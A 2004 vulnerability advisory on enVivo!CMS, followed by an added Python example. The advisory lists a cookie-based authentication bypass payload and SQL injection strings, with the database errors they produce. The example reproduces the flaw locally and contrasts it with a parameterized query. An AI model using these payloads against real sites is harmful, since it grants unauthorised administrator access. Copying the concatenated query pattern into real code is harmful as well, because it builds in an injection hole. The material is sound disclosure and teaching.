QUOTE

Authentication Bypass and Multiple SQL injections in enVivo!CMS

Severity: High
Title: Authentication Bypass and Multiple SQL injections in enVivo!CMS
Date: 29/04/2004
Vendor: EnvivoSoft
Vendor Website: http://www.envivosoft.com/
Vendor Status: Vendor was notified but with no response yet.

Proof of Concept Exploits:

http://localhost/envivo101/envivocms/admin_login.asp
AUTHENTICATION BYPASS
By setting both the cookie username and password values to a' or 'a' = 'a
you can get access to the administrative account, for example:
Cookiename: 101
Cookievalue: remStayLoggedIn=True&remPassword=a%27+or+%27a%27+%3D+%27a&remUserName=a%27+or+%27a%27+%3D+%27a
Result: Hello enVivo!CMS Classic Administrator (admin) - Content Awaiting Approval

CODE

If Xe5c10c3X(Request.Cookies(CStr(INSTANCE_ID))("remUserName"), _
             Request.Cookies(CStr(INSTANCE_ID))("remPassword"), _
             Request.Cookies(CStr(INSTANCE_ID))("remStayLoggedIn")) Then
    X4047377X = True


http://localhost/envivo101/envivocms/admin_login.asp
SQL INJECTION
By setting the Username field to 'SQL_INJECTION you get,

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'username = ''' AND pword = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855''.

/envivo101/envivocms/envivoadminAPI.asp, line 3077

http://localhost/envivo101/default.asp?act...9;SQL_INJECTION
SQL INJECTION

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression '((articlespub.title
LIKE '%'SQL_INJECTION%' OR articlespub.abstract LIKE '%'SQL_INJECTION%' OR
articlespub.article LIKE '%'SQL_INJECTION%')) AND articlespub.releasetoweb
= 1 AND DATE() BETWEEN articlespub.startdate AND articlespub.enddate'.

/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 788

http://localhost/envivo101/default.asp?act...='SQL_ERROR

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'CLng'

/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 42

Author:
These vulnerabilities have been found and released by Diabolic Crab
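
The cookie check described above, reduced to its SQL behaviour: an added example, not part of the advisory and not the vendor's code. It runs the advisory's cookie value through a concatenated query and through a parameterized one. SQLite stands in for JET; the column names come from the error text above, while the table name `users`, the stored password and all function names are assumptions.

```python
import hashlib
import sqlite3
from urllib.parse import parse_qs

# Cookie value quoted in the advisory above.
ADVISORY_COOKIE = ("remStayLoggedIn=True&remPassword=a%27+or+%27a%27+%3D+%27a"
                   "&remUserName=a%27+or+%27a%27+%3D+%27a")


def make_db():
    """Constructed stand-in for the CMS account table (SQLite, not JET)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pword TEXT)")
    stored = hashlib.sha256(b"constructed-password").hexdigest()
    db.execute("INSERT INTO users VALUES ('admin', ?)", (stored,))
    return db


def parse_cookie(value):
    """Return (remUserName, remPassword) after URL-decoding the cookie."""
    fields = parse_qs(value, keep_blank_values=True)
    return fields.get("remUserName", [""])[0], fields.get("remPassword", [""])[0]


def check_concatenated(db, user, pword):
    """Vulnerable pattern: cookie text becomes part of the SQL statement."""
    sql = ("SELECT username FROM users WHERE username = '" + user +
           "' AND pword = '" + pword + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def check_parameterized(db, user, pword):
    """Hardened form: values are bound, so quotes stay inside the data."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pword = ?",
        (user, pword),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    user, pword = parse_cookie(ADVISORY_COOKIE)
    print("concatenated :", check_concatenated(db, user, pword))
    print("parameterized:", check_parameterized(db, user, pword))
```

In the concatenated query the trailing `or 'a' = 'a'` makes the WHERE clause true for every row, so the first account is returned; with bound parameters the same cookie matches no row.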


